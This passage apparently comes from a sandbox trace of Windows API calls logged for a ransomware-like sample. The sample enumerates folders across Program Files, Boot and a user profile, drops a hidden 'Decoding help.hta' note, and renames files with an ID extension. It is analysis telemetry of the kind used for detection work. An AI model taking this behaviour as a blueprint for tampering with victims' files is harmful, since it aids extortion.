lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*" [0039.209] GlobalMemoryStatus (in: lpBuffer=0x530fd10 | out: lpBuffer=0x530fd10) [0039.209] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4208590, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x198 [0039.216] CloseHandle (hObject=0x198) returned 1 [0039.216] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x530fd30 | out: lpFindFileData=0x530fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MEDIA", cAlternateFileName="")) returned 1 [0039.216] lstrcmpW (lpString1=".", lpString2="MEDIA") returned -1 [0039.216] lstrcmpW (lpString1="..", lpString2="MEDIA") returned -1 [0039.216] lstrcmpiW (lpString1="windows", lpString2="MEDIA") returned 1 [0039.218] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*" [0039.218] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*") returned 41 [0039.218] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\", lpString2="MEDIA" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA" [0039.218] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\*.*" [0039.218] GlobalMemoryStatus (in: lpBuffer=0x530fd10 | out: lpBuffer=0x530fd10) [0039.218] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9611d50, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x198 [0039.230] CloseHandle (hObject=0x198) returned 1 [0039.230] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x530fd30 | out: lpFindFileData=0x530fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe5db9aa0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5db9aa0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office14", cAlternateFileName="")) returned 1 [0039.230] lstrcmpW (lpString1=".", lpString2="Office14") returned -1 [0039.230] lstrcmpW (lpString1="..", lpString2="Office14") returned -1 [0039.230] lstrcmpiW (lpString1="windows", lpString2="Office14") returned 1 [0039.231] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*" [0039.232] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*") returned 41 [0039.232] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\", lpString2="Office14" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14" [0039.232] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*" [0039.232] GlobalMemoryStatus (in: lpBuffer=0x530fd10 | out: lpBuffer=0x530fd10) [0039.232] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9629db8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x198 [0039.243] CloseHandle (hObject=0x198) returned 1 [0039.243] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x530fd30 | out: lpFindFileData=0x530fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd3eb50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xebb910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xebb910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0039.243] lstrcmpW (lpString1=".", lpString2="Stationery") returned -1 [0039.243] lstrcmpW (lpString1="..", lpString2="Stationery") returned -1 [0039.243] lstrcmpiW (lpString1="windows", lpString2="Stationery") returned 1 [0039.245] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*" [0039.245] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*") returned 41 [0039.245] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\", lpString2="Stationery" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery" [0039.245] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\*.*" [0039.245] GlobalMemoryStatus (in: lpBuffer=0x530fd10 | out: lpBuffer=0x530fd10) [0039.245] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9689f58, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x198 [0039.268] CloseHandle (hObject=0x198) returned 1 [0039.268] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x530fd30 | out: lpFindFileData=0x530fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf59f9270, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0039.268] lstrcmpW (lpString1=".", lpString2="Templates") returned -1 [0039.268] lstrcmpW (lpString1="..", lpString2="Templates") returned -1 [0039.268] lstrcmpiW (lpString1="windows", lpString2="Templates") returned 1 [0039.270] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*" [0039.270] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*") returned 41 [0039.270] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\", lpString2="Templates" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates" [0039.270] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\*.*" [0039.270] GlobalMemoryStatus (in: lpBuffer=0x530fd10 | out: lpBuffer=0x530fd10) [0039.270] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x96ba028, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x198 [0039.276] CloseHandle (hObject=0x198) returned 1 [0039.276] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x530fd30 | out: lpFindFileData=0x530fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf59f9270, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 0 [0039.276] FindClose (in: hFindFile=0x5a52f0 | out: hFindFile=0x5a52f0) returned 1 Thread: id = 45 os_tid = 0xae8 [0039.205] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fi-FI\\*.*", lpFindFileData=0x544fd30 | out: lpFindFileData=0x544fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a54b0 [0039.205] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.205] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x544fd30 | out: lpFindFileData=0x544fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.205] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.205] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.205] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x544fd30 | out: lpFindFileData=0x544fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.206] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Boot\\fi-FI\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\fi-FI\\*.*") returned="\\\\?\\C:\\Boot\\fi-FI\\*.*" [0039.206] lstrlenW (lpString="\\\\?\\C:\\Boot\\fi-FI\\*.*") returned 21 [0039.206] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\fi-FI\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\fi-FI\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\fi-FI\\Decoding help.hta" [0039.206] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\Decoding help.hta" (normalized: "c:\\boot\\fi-fi\\decoding help.hta")) returned 0xffffffff [0039.206] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\Decoding help.hta" (normalized: "c:\\boot\\fi-fi\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0039.206] WriteFile (in: hFile=0x1a8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x544fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x544fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.207] CloseHandle (hObject=0x1a8) returned 1 [0039.207] SetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.207] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bootmgr.exe.mui") returned 1 [0039.207] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0039.207] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\fi-FI\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\fi-FI\\*.*") returned="\\\\?\\C:\\Boot\\fi-FI\\*.*" [0039.207] lstrlenW (lpString="\\\\?\\C:\\Boot\\fi-FI\\*.*") returned 21 [0039.207] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\fi-FI\\", lpString2="bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui" [0039.207] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui" [0039.207] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0039.207] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), lpNewFileName="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.207] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x544fd30 | out: lpFindFileData=0x544fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.208] FindClose (in: hFindFile=0x5a54b0 | out: hFindFile=0x5a54b0) returned 1 Thread: id = 46 os_tid = 0xaec [0039.215] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*", lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a53f0 [0039.215] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.215] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.215] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.215] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.215] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0039.215] lstrcmpW (lpString1=".", lpString2="AppData") returned -1 [0039.215] lstrcmpW (lpString1="..", lpString2="AppData") returned -1 [0039.215] lstrcmpiW (lpString1="windows", lpString2="AppData") returned 1 [0039.215] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0039.215] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0039.215] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="AppData" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" [0039.215] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*" [0039.215] GlobalMemoryStatus (in: lpBuffer=0x558fd10 | out: lpBuffer=0x558fd10) [0039.215] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x603e28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0039.229] CloseHandle (hObject=0x1c4) returned 1 [0039.229] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0039.229] lstrcmpW (lpString1=".", lpString2="Application Data") returned -1 [0039.229] lstrcmpW (lpString1="..", lpString2="Application Data") returned -1 [0039.229] lstrcmpiW (lpString1="windows", lpString2="Application Data") returned 1 [0039.229] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0039.229] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0039.229] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Application Data" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data" [0039.229] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*.*" [0039.229] GlobalMemoryStatus (in: lpBuffer=0x558fd10 | out: lpBuffer=0x558fd10) [0039.229] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x33c8250, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0039.241] CloseHandle (hObject=0x1c4) returned 1 [0039.241] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0039.241] lstrcmpW (lpString1=".", lpString2="Contacts") returned -1 [0039.241] lstrcmpW (lpString1="..", lpString2="Contacts") returned -1 [0039.241] lstrcmpiW (lpString1="windows", lpString2="Contacts") returned 1 [0039.242] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0039.242] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0039.242] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Contacts" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" [0039.242] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" [0039.242] GlobalMemoryStatus (in: lpBuffer=0x558fd10 | out: lpBuffer=0x558fd10) [0039.243] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9671ef0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0039.267] CloseHandle (hObject=0x1c4) returned 1 [0039.267] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0039.267] lstrcmpW (lpString1=".", lpString2="Cookies") returned -1 [0039.267] lstrcmpW (lpString1="..", lpString2="Cookies") returned -1 [0039.267] lstrcmpiW (lpString1="windows", lpString2="Cookies") returned 1 [0039.267] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0039.267] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0039.267] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Cookies" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies" [0039.267] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*.*" [0039.267] GlobalMemoryStatus (in: lpBuffer=0x558fd10 | out: lpBuffer=0x558fd10) [0039.267] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4238660, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0039.274] CloseHandle (hObject=0x1c4) returned 1 [0039.274] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x174c0690, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x174c0690, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0039.274] lstrcmpW (lpString1=".", lpString2="Desktop") returned -1 [0039.274] lstrcmpW (lpString1="..", lpString2="Desktop") returned -1 [0039.274] lstrcmpiW (lpString1="windows", lpString2="Desktop") returned 1 [0039.275] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0039.275] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0039.275] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Desktop" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0039.275] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0039.275] GlobalMemoryStatus (in: lpBuffer=0x558fd10 | out: lpBuffer=0x558fd10) [0039.275] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x42506c8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0039.282] CloseHandle (hObject=0x1c4) returned 1 [0039.282] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xff5e9b0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0xff5e9b0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, 